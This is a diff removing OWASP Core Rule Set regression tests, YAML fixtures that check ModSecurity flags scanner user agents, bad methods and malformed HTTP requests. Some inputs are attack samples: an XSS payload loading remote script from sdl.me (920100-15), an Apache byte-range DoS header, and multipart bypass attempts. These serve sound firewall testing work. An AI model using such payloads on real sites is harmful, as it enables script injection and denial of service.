- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: FOO
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "911100"
- test_title: 911100-8
desc: Method is not allowed by policy (911100) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: SUBSCRIBE
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "911100"

84
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml vendored
View file

@ -1,84 +0,0 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 913100.yaml
tests:
- test_title: 913100-1
desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Havij
method: GET
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "913100"
- test_title: 913100-2
desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Arachni/0.2.1
method: GET
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "913100"
- test_title: 913100-3
desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: w3af.sourceforge.net
method: GET
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "913100"
- test_title: 913100-4
desc: "Scanner identification based on User-agent field"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
User-agent: "nessus"
uri: "/"
output:
log_contains: id "913100"

43
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913110.yaml vendored
View file

@ -1,43 +0,0 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 913110.yaml
tests:
- test_title: 913110-1
desc: Request Indicates a Security Scanner Scanned the Site (913110) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Acunetix-Product: WVS/5.0 (Acunetix Web Vulnerability Scanner - EVALUATION)
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
method: GET
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "913110"
- test_title: 913110-2
desc: "Scanner identification based on custom header"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
X-Scanner: "whatever"
uri: "/"
output:
log_contains: id "913110"

55
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913120.yaml vendored
View file

@ -1,55 +0,0 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 913120.yaml
tests:
- test_title: 913120-1
desc: Request Indicates a Security Scanner Scanned the Site (913120) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
method: GET
port: 80
uri: /nessustest
version: HTTP/1.0
output:
log_contains: id "913120"
- test_title: 913120-2
desc: IBM fingerprint from (http://www-01.ibm.com/support/docview.wss?uid=swg21293132)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
uri: /AppScan_fingerprint/MAC_ADDRESS_01234567890.html?9ABCDG1
version: HTTP/1.0
output:
log_contains: id "913120"
- test_title: 913120-3
desc: "Scanner identification based on uri"
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
version: HTTP/1.0
uri: "/nessus_is_probing_you_"
output:
log_contains: id "913120"

256
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml vendored
View file

@ -1,256 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920100.yaml"
description: "Tests to trigger, or not trigger 920100"
tests:
- # Standard GET request
test_title: 920100-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/"
version: "HTTP/1.1"
output:
no_log_contains: "id \"920100\""
- # Request has tab (\t) before request method - Apache complains
# AH00126: Invalid URI in request GET / HTTP/1.1
test_title: 920100-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: " GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/"
version: "HTTP/1.1"
output:
status: [400]
- # Perfectly valid OPTIONS request
test_title: 920100-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "OPTIONS"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "*"
version: "HTTP/1.1"
output:
no_log_contains: "id \"920100\""
- # Valid CONNECT request however this is disabled by Apache default
test_title: 920100-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "CONNECT"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "1.2.3.4:80"
version: "HTTP/1.1"
output:
status: [405, 403]
- # invalid Connect request, domains require ports
test_title: 920100-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "CONNECT"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "www.cnn.com"
version: "HTTP/1.1"
output:
status: [400]
- # This is an acceptable CONNECT request for SSL tunneling
test_title: 920100-6
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "CONNECT"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests #FP"
Host: "localhost"
protocol: "http"
uri: "www.cnn.com:80"
version: "HTTP/1.1"
output:
log_contains: "id \"920100\""
- # Valid request with query and anchor components
test_title: 920100-7
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/index.html?I=Like&Apples=Today#tag"
version: "HTTP/1.1"
output:
no_log_contains: "id \"920100\""
- # The colon in the path is not allowed. Apache will block by default
# (20024)The given path is misformatted or contained invalid characters: [client 127.0.0.1:4142] AH00127: Cannot map GET /index.html:80?I=Like&Apples=Today#tag HTTP/1.1 to file
test_title: 920100-8
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/index.html:80?I=Like&Apples=Today#tag"
version: "HTTP/1.1"
output:
status: [400, 403]
- # Normal Options request with path
test_title: 920100-9
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "OPTIONS"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/"
version: "HTTP/1.1"
output:
no_log_contains: "id \"920100\""
- # An invalid method with a long name
test_title: 920100-10
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "REALLYLONGUNREALMETHOD"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests # FN"
Host: "localhost"
protocol: "http"
uri: "/"
version: "HTTP/1.1"
output:
log_contains: "id \"920100\""
- # An invalid request because a backslash is used in uri
# Apache will end up blocking this before it gets to CRS.
# We will need to support OR output tests to fix this
test_title: 920100-11
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests # FN"
Host: "localhost"
protocol: "http"
uri: "\\"
version: "HTTP/1.1"
output:
status: [403, 400]
- test_title: 920100-12
desc: Invalid HTTP Request Line (920100) - Test 1 from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: "\tGET"
port: 80
uri: /
version: HTTP/1.1
output:
status: [400]
- test_title: 920100-13
desc: Invalid HTTP Request Line (920100) - Test 2 from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: \index.html
version: HTTP\1.0
output:
status: [403, 400]
# log_contains: id "920100"
- test_title: 920100-14
desc: Invalid HTTP Request Line (920100) - Test 3 from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: '|GET'
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "920100"
- test_title: 920100-15
desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
- stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/demo/xss/xml/vuln.xml.php?input=<script xmlns="http://www.w3.org/1999/xhtml">setTimeout("top.frame2.location=\"javascript:(function () {var x = document.createElement(\\\"script\\\");x.src = \\\"//sdl.me/popup.js?//\\\";document.childNodes\[0\].appendChild(x);}());\"",1000)</script>&//'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
status: [403, 400]
# log_contains: id "920100"

105
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml vendored
View file

@ -1,105 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920120.yaml"
description: "Tests to trigger rule 920120"
tests:
- test_title: 920120-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "*/*"
Accept-Language: "en"
Connection: "close"
Referer: "http://localhost/"
Content-Type: "multipart/form-data; boundary=--------397236876"
data: |
----------397236876
Content-Disposition: form-data; name="fileRap"; filename="file=.txt"
Content-Type: text/plain
555-555-0199@example.com
----------397236876--
protocol: "http"
output:
log_contains: "id \"920120\""
- test_title: 920120-2
desc: Attempted multipart/form-data bypass (920120) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------627652292512397580456702590
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv
method: POST
port: 80
uri: /cgi-bin/fup.cgi
version: HTTP/1.1
data: |
-----------------------------627652292512397580456702590
Content-Disposition: form-data; name="fi=le"; filename="test"
Content-Type: text/plain
email: security@modsecurity.org
-----------------------------627652292512397580456702590
Content-Disposition: form-data; name="note"
Contact info.
-----------------------------627652292512397580456702590--
output:
log_contains: id "920120"
- test_title: 920120-3
desc: Invalid Request Body (920120) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.1
data: |
-----------------------------265001916915724
Content-Disposition: form-data; name="fi;le"; filename="test"
Content-Type: application/octet-stream
Rotem & Ayala
-----------------------------265001916915724
Content-Disposition: form-data; name="name"
t2
-----------------------------265001916915724
Content-Disposition: form-data; name="B1"
Submit
-----------------------------265001916915724--
output:
log_contains: id "920120"

106
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml vendored
View file

@ -1,106 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920160.yaml"
description: "Tests to trigger rule 920160"
tests:
- # Non digit Content-Length without content-type
test_title: 920160-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Length: "NotDigits"
protocol: "http"
uri: "/"
output:
status: [400]
- # Non digit content-length with content-type
test_title: 920160-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "NotDigits"
protocol: "http"
uri: "/"
output:
status: [400]
- # Mixed digit and non digit content length
test_title: 920160-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "123x"
protocol: "http"
uri: "/"
output:
status: [400]
- # Apache auto corrects for this error now so the log should not contain anything
test_title: 920160-4
desc: Content-Length HTTP header is not numeric (920160) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Length: '3'
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /post
version: HTTP/1.0
data: abc
output:
status: [200]
no_log_contains: id "920160"
- test_title: 920160-5
desc: Content-Length HTTP header is not numeric (920160) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Length: "3;"
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.0
data: abc
output:
status: [200, 403, 400]
# log_contains: id "920160"

115
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml vendored
View file

@ -1,115 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920170.yaml"
description: "A Selection of tests to trigger rule 920170"
tests:
- # POST Request with data (valid)
test_title: 920170-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
uri: "/"
output:
no_log_contains: "id \"920170\""
- # GET request with data
test_title: 920170-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
uri: "/"
output:
log_contains: "id \"920170\""
- # Head Request with data
test_title: 920170-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "HEAD"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
uri: "/"
output:
log_contains: "id \"920170\""
- # GET Request but content length is 0 and data is provided
# Weird HTTP 1.0 support bug in Apache, without newline causes 408
test_title: 920170-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests # Possibly shouldn't pass"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "0"
data: "hi=test\r\n"
stop_magic: true
protocol: "http"
uri: "/"
output:
no_log_contains: "id \"920170\""
- # GET request with content length 0 and no data.
test_title: 920170-6
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "0"
data: ""
protocol: "http"
uri: "/"
output:
no_log_contains: "id \"920170\""
- test_title: 920170-7
desc: GET or HEAD Request with Body Content (920170) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.0
data: abc
output:
log_contains: id "920170"

82
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml vendored
View file

@ -1,82 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920180.yaml"
description: "Description"
tests:
- test_title: 920180-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
protocol: "http"
stop_magic: true
uri: "/"
output:
log_contains: id "920180"
- test_title: 920180-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
protocol: "http"
uri: "/"
output:
no_log_contains: id "920180"
- test_title: 920180-3
desc: POST request missing Content-Length Header (920180) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "920180"
- test_title: 920180-4
desc: Ignore check of CT header if protocol is HTTP/2
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/2.0
output:
no_log_contains: id "920180"

33
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml vendored
View file

@ -1,33 +0,0 @@
---
meta:
author: "fgsch"
enabled: true
name: "920181.yaml"
description: "Description"
tests:
- test_title: 920181-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
uri: "/"
headers:
Host: "localhost"
Accept: "*/*"
Content-Length: 7
Content-Type: "application/x-www-form-urlencoded"
Transfer-Encoding: "chunked"
User-Agent: "ModSecurity CRS 3 Tests"
data: |
7
foo=bar
0
stop_magic: true
output:
# Apache unsets the Content-Length header if
# Transfer-Encoding is found!
no_log_contains: id "920181"

44
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml vendored
View file

@ -1,44 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920190.yaml"
description: "Description"
tests:
- test_title: 920190-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Range: "0-1"
protocol: "http"
uri: "/"
output:
no_log_contains: id "920190"
- test_title: 920190-2
desc: 'Range: Invalid Last Byte Value (920190) from old modsec regressions'
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Connection: close
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
log_contains: id "920190"

150
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml vendored
View file

@ -1,150 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920200.yaml"
description: "Description"
tests:
- test_title: 920200-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Range: "bytes=1-10,11-20,21-30,31-40,41-50,51-60"
output:
log_contains: "id \"920200\""
- # Sample taken from https://github.com/alienwithin/php-utilities/blob/master/apache-byte-range-server-dos/apache_byte_range_server_dos.php
test_title: 920200-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Request-Range: "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10,11-11"
output:
log_contains: "id \"920200\""
- test_title: 920200-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Range: "bytes=1-10, 11-20, 21-30, 31-40, 41-50"
output:
no_log_contains: "id \"920200\""
- test_title: 920200-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests #FP"
Host: "localhost"
Range: "bytes=-10,-, 21-30,31-40,41-50,51-500,"
output:
log_contains: "id \"920200\""
- test_title: 920200-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests #FP"
Host: "localhost"
Range: "bytes=1-,11-20, 21-30,31-40,41-50,51-500"
output:
log_contains: "id \"920200\""
- test_title: 920200-6
desc: 'Range: Too many fields (920200) from old modsec regressions'
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Connection: close
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.1
output:
log_contains: id "920200"
- test_title: 920200-7
desc: This should PASS (PL2)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: bytes=10-11, 20-21, 30-31, 40-41, 50-51
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.html
output:
no_log_contains: id "920200"
- test_title: 920200-8
desc: "This should FAIL with rule 920200 (PL2)"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.html
output:
log_contains: id "920200"
- test_title: 920200-9
desc: This should PASS (PL2)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.pdf
output:
no_log_contains: id "920200"
- test_title: 920200-10
desc: This should PASS (PL2)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.pdf
output:
no_log_contains: id "920200"

22
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml vendored
View file

@ -1,22 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920201.yaml"
description: "Tests for 920201"
tests:
- test_title: 920201-1
desc: This should FAIL with rule 920201 (PL2)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341, 350-351, 360-361, 370-371, 380-381, 390-391, 400-401, 410-411, 420-421, 430-431, 440-441, 450-451, 460-461, 470-471, 480-481, 490-491, 500-501, 510-511, 520-521, 530-531, 540-541, 550-551, 560-561, 570-571, 580-581, 590-591, 600-601, 610-611, 620-621, 630-631"
User-Agent: "ModSecurity CRS 3 Tests"
method: GET
port: 80
uri: /index.pdf
output:
log_contains: id "920201"

22
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml vendored
View file

@ -1,22 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
